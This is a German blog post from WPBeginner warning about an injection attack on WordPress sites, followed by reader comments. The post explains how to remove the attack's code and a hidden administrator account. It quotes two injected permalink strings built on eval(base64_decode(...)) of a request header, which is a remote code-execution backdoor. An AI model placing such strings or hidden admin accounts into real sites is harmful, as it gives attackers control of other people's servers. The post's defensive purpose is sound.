WPBeginner - WordPress-Tutorials für Anfänger

Vertrauenswürdige WordPress-Tutorials, wenn Sie sie am dringendsten benötigen.
Anfängerleitfaden für WordPress
WPB Cup
25 Millionen+
Websites, die unsere Plugins verwenden
16+
Jahre WordPress-Erfahrung
3000+
WordPress-Tutorials von Experten

WordPress SQL-Injection – Neueste Angriffe

Von Editorial Staff | | Offenlegung für Leser

Shares 2 ChatGPT Perplexity X LinkedIn WhatsApp

Viele Websites werden von einem aktuellen SQL-Angriff getroffen, bei dem Codes in Ihre Website eingeschleust werden. Diese MySQL-Injektion beeinträchtigt Ihre Permalinks, indem sie diese unwirksam macht. Infolgedessen funktionieren die URLs Ihrer Blogbeiträge nicht mehr. Zahlreiche WordPress-Blogs wurden bei diesem Angriff ins Visier genommen. Dank Andy Soward dafür, dass er uns darauf aufmerksam gemacht hat.

Einer der folgenden Codes wurde aufgrund dieses Angriffs zu Ihrer Permalink-Struktur hinzugefügt:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Diese Anführungszeichen wurden an alle Permalinks auf Ihrer Website angehängt und können nur geändert werden, wenn sie manuell entfernt werden.

Um dies zu beheben, gehen Sie zu:

Einstellungen > Permalinks und entfernen Sie den obigen Code und ersetzen Sie Ihren Standardcode.

Als Nächstes müssen Sie zu Benutzer gehen. Sie werden sehen, dass es mehr als einen Administrator gibt. Sie werden deren Namen nicht sehen, aber Sie werden sehen, dass die Anzahl gestiegen ist. Was Sie also tun müssen, ist, alle Benutzer anzusehen und den letzten zu finden, der sich registriert hat. Bewegen Sie Ihre Maus über diesen Benutzer und holen Sie sich den Link. Ändern Sie den Code userid= , indem Sie zu dieser Zahl 1 addieren. Wenn der letzte Benutzer, den Sie sehen können, also Benutzer Nr. 2 war, addieren Sie 1 hinzu und machen Sie ihn zu 3. Sie sollten feststellen, dass der versteckte Admin einen seltsamen Code als Vornamen hat. Löschen Sie den Code und machen Sie ihn zu einem Abonnenten. Kehren Sie dann zurück und löschen Sie ihn.

Dies sollte das Problem beheben. Sie können ihn auch löschen, indem Sie einfach zu Ihrem PHPMyAdmin gehen. Dort sehen Sie den Benutzer.

Wir wollten diese Nachricht so schnell wie möglich verbreiten, damit unsere Benutzer informiert werden können. Bitte stellen Sie sicher, dass Ihr Blog nicht infiziert ist. Wir hoffen, dass WordPress bald eine neue Version herausbringt.

Außerdem, wenn Sie einige dieser Maßnahmen zur Sicherung Ihres WordPress Admin-Bereichs noch nicht implementiert haben.

Beliebt auf WPBeginner Gerade jetzt!

Offenlegung: Unsere Inhalte werden von unseren Lesern unterstützt. Das bedeutet, wenn Sie auf einige unserer Links klicken, können wir eine Provision verdienen. Sehen Sie wie WPBeginner finanziert wird, warum das wichtig ist und wie Sie uns unterstützen können. Hier ist unser Redaktionsprozess.

Das ultimative WordPress-Toolkit

Erhalten Sie KOSTENLOSEN Zugang zu unserem Toolkit – eine Sammlung von WordPress-bezogenen Produkten und Ressourcen, die jeder Profi haben sollte!

Jetzt herunterladen

Leserinteraktionen

8 CommentsLeave a Reply

  1. Die Datenbank meiner Website wurde vor ein paar Tagen injiziert, wobei nach jeder Beitrags- oder Seiten-URL seltsame Zeichen und Wörter hinzugefügt wurden. Ich konnte nichts Seltsames in den Einstellungen finden: Permalinks oder im Benutzer-Menü. Was kann ich tun, um dieses Problem zu beheben, bitte? Meine Hosting-Firma hat auch ein Backup der infizierten Datenbank!

    Reply

  2. Ich wurde zweimal davon getroffen.

    Beim ersten Mal war es wassup Plugin SQL-Injection, diesmal bin ich mir nicht sicher. Mein Hosting-Provider hat mich blockiert.

    Sobald sie mein Konto wiederherstellen, werde ich WordPress entfernen... Ich habe die Nase voll!

    Reply

    • Was haben Sie damit herausgefunden? Ich wurde gerade mit demselben Problem konfrontiert. Alle meine WP-Seiten auf meinem Konto leiden unter demselben Problem.

      Reply

    • Wir wissen diesen Kommentar sehr zu schätzen, das Problem lag nicht bei WP Super Cache, wir glauben, es war das Plugin namens WP External Link. Wir haben WP-Super Cache zweimal deinstalliert und neu installiert, aber dann haben wir den Entwicklungsserver verglichen, auf dem alles gut funktionierte. Der Unterschied war dieses Plugin. Als wir dieses Plugin entfernt haben, funktionierte es. Sie können diesen Beitrag jetzt lesen.

      Reply

      Admin

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, ich lese gerade!
        Vielen Dank!

        Reply

Hinterlassen Sie eine Antwort

Vielen Dank, dass Sie einen Kommentar hinterlassen. Bitte beachten Sie, dass alle Kommentare gemäß unserer Kommentarrichtlinie moderiert werden und Ihre E-Mail-Adresse NICHT veröffentlicht wird. Bitte verwenden Sie KEINE Schlüsselwörter im Namensfeld. Führen wir ein persönliches und bedeutungsvolles Gespräch.

Copyright © 2009 - 2025 WPBeginner LLC. Alle Rechte vorbehalten. WPBeginner® ist eine eingetragene Marke.

Verwaltet von Awesome Motive | WordPress-Hosting von SiteGround

Die Marke WordPress® ist das geistige Eigentum der WordPress Foundation. Die Verwendung von WordPress®-Namen auf dieser Website dient ausschließlich Identifikationszwecken und impliziert keine Billigung durch die WordPress Foundation. WPBeginner wird nicht von der WordPress Foundation unterstützt, besessen oder ist mit ihr verbunden.

Ich brauche Hilfe bei…

Beliebte Suchen:

Einen Blog starten WordPress SEO WordPress-Performance WordPress-Fehler WordPress-Sicherheit Aufbau eines Online-Shops